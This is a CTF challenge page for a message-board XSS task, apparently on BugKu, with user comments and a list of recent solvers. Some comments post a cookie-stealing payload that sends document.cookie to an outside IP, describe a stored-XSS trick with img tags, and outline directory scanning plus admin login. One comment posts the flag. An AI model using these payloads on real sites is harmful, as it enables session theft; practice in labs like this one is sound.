留言板WEB 未解决

分数: 10 金币: 3
题目作者: harry
一  血: ꧁༺༽༾ཊ彪ཏ༿༼༻꧂
一血奖励: 5金币
解  决: 3042
提  示: 题目无需登录后台!需要xss平台接收flag
描  述:
http协议需要http协议的xss平台
...
登录回复
评论
treasure11 1年前
举报

....太难了

回复 0
mAns0nw0W 1年前
举报

flag{0d25978069e52fed99591c5c19ca0663}

回复 0
APTX4869ZRC 1年前
举报

BugKu真的很酷

回复 0
Warm2pPing 1年前
举报

提示:需要xss平台接收flag 那就是自己找一个XSS平台咯~ 然后开始注入 大概是平台地址加上 ?cookie=+document.cookie 没时间了自己拼接吧

回复 0
kanljk 1年前
举报

<svg onload="window.open('http://IP/'+document.cookie)">

回复 0
XRain 1年前
举报

思路想错了,我一直在测试前台留言的XSS,前台留言时在 [img][/img] 之间插入超长字符串,就会导致 img 标签的 src 属性的双引号没有闭合,直到再次留言时插入的 [img][/img] 才闭合,所以可以给后一次留言中的 img 标签注入 onerror 属性及其 js 代码,最终导致前台存储型 XSS。不过,我离题了,白白浪费了半天的时间。

回复 0
18363158240 2年前
举报

小括号被转成‘|’了,xss漏洞被修复了

回复 0
老渡真的不懂 2年前
举报

有大佬能看一下吗,注入代码XSS平台怎么都接收不到,结果去爆admin的密码登录后就接收到了。。。。。

回复 2
laodao 2年前
举报

这个题有问题吧 必须要登录admin.php才可以看到flag,admin密码不是弱密码

回复 2
qfgk16 1月前
举报

@harry xss回显不了

回复 0
harry 管理员 2年前
举报

不需要登录

回复 0
2762249990 2年前
举报

先目录扫描,扫出admin.php,登录,原页面<script>alert(1)</script>,看到有1弹窗于是<script>alert(document.cookie)</script>,显示出flag,url解码

回复 3

WriteUp

image
丶我亚索贼六

5 金币

立即查看

评分(18)

解题动态

walkerming 攻破了该题 21小时前
吴王饭差 攻破了该题 1天前
2177989632 攻破了该题 1天前
zcgzcx1234 攻破了该题 1天前
aaaaab 攻破了该题 1天前
2021060287 攻破了该题 2天前
lianhaorui 攻破了该题 3天前
xiaona1111 攻破了该题 5天前
Adwuwuuuuc 攻破了该题 5天前
(eleven) 攻破了该题 6天前
3396516192 攻破了该题 7天前
azzr997 攻破了该题 8天前
15321809027 攻破了该题 9天前
eason2023 攻破了该题 9天前
huasir 攻破了该题 11天前
孙燕姿圈外男友 攻破了该题 11天前
1045123 攻破了该题 11天前
tianhe 攻破了该题 11天前
ctfldc 攻破了该题 12天前
ffggfhge 攻破了该题 13天前
问题反馈